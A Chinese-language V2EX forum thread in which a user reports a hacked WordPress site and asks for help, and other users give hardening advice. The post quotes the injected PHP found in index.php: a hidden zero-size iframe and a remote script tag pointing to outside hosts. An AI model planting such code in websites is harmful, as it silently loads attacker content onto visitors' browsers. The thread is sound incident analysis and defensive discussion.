WordPress 站点被黑

2014-03-18 09:48:57 +08:00
 miniwade514
客户的网站首页昨晚突然没有样式了,用 Chrome 审查元素一看 head 里面只有两个标签,一个是啥忘了(当时着急没截图),一个是 style 标签,里面有一行简短的 CSS,没什么用。

点了一篇文章,发现文章页的样式是好的;点进一个分类,发现分类页是好的。

然后就到 index.php 里面看,发现原本的:
<?php
get_header();
?>
被换成了这两行:
<?php
echo '<iframe src="http://wowow.usa.cc/" width="0" height="0" style="visibility: hidden"></iframe>';
echo '<script type="text/javascript" src="http://mobuna.com/js?id=8173"></script>';
?>

改回去之后问题解决了。

----------------- 背景补充 ------------------

1. 账户很多:这个 WordPress 站点有很多个账户,从“管理员”到“编辑”都有,编辑最多。WordPress 里面管理员有所有权限,包括安装主题、插件的权限,编辑只能编辑、发布文章,上传、处理图片或其他媒体资源。

2. 主题不熟悉:主题是买的国外的,功能比较复杂,不清楚有没有漏洞。

3. 被黑过:网站之前也被黑过一次。当时不是我处理的,不了解当时具体情况。

4. FTP 密码应该还是比较复杂的(给我的密码是大小写数字标点结合的,猜测其他账户也差不多)。

----------------- 请教各位 ------------------

1. 这属于哪种攻击行为?对攻击者有什么用?

2. 万一 WordPress 的编辑账户的密码被破解,攻击者能否利用这个来实施攻击?比如上述的攻击?
3740 次点击
所在节点    WordPress
5 条回复
cst4you
2014-03-18 09:56:51 +08:00
wp没事还是锁死文件权限吧, 我一新装的最新wp, 没有用户, 管理员强密码, 用的最新默认主题, 照样被人家改模版加了恶意代码
zoowii
2014-03-18 10:02:17 +08:00
搞技术的用Google Blogger多好
要么自己基于Markdown+Disqus/多说简单实现一个,也不麻烦
alsotang
2014-03-18 10:07:16 +08:00
@cst4you 被脚本小子扫到了
miniwade514
2014-03-18 10:33:12 +08:00
@cst4you
@alsotang
求教我遇到的这种属于什么攻击?他都能直接改我的PHP文件了太可怕了。。
@zoowii
是客户的网站
WPTutsIO
2014-03-18 11:06:25 +08:00
极有可能是某个账户被攻破了。

几个安全建议:

1. 管理员账户数量要严格控制;
2. 禁用直接在后台修改主题文件和插件文件的功能;
3. 避免泄露 WP 的版本号;
4. 隐藏登陆页地址;

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/104772

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX